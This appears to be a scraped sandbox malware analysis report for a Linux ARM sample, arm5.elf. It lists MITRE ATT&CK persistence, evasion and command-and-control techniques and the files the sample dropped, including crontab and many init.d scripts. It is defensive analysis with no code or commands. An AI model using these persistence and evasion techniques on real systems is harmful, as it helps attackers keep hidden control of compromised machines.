Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shell s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system ( `/etc` ) and the user’s home directory ( `~/` ) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.
Tactics:	Defense Evasion
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Creation, File: File Metadata, File: File Modification, Firmware: Firmware Modification, Process: OS API Execution, Process: Process Creation, Script: Script Execution, Service: Service Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
Tactics:	Impact
Data Sources:	File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report arm5.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/.mod

/boot/system.pub

/etc/.cfg

/etc/crontab

/etc/init.d/acpid

/etc/init.d/alsa-utils

/etc/init.d/anacron

/etc/init.d/apparmor

/etc/init.d/apport

/etc/init.d/avahi-daemon

/etc/init.d/binfmt-support

/etc/init.d/bluetooth

/etc/init.d/console-setup.sh

/etc/init.d/cron

/etc/init.d/cryptdisks

/etc/init.d/cryptdisks-early

/etc/init.d/cups

/etc/init.d/cups-browsed

/etc/init.d/dbus

/etc/init.d/dns-udp4

/etc/init.d/gdm3

/etc/init.d/hddtemp

/etc/init.d/hwclock.sh

/etc/init.d/irqbalance

/etc/init.d/iscsid

/etc/init.d/keyboard-setup.sh

/etc/init.d/kmod

/etc/init.d/lightdm

/etc/init.d/lm-sensors

/etc/init.d/lvm2-lvmpolld

/etc/init.d/mono-xsp4

Linux Analysis Report
arm5.elf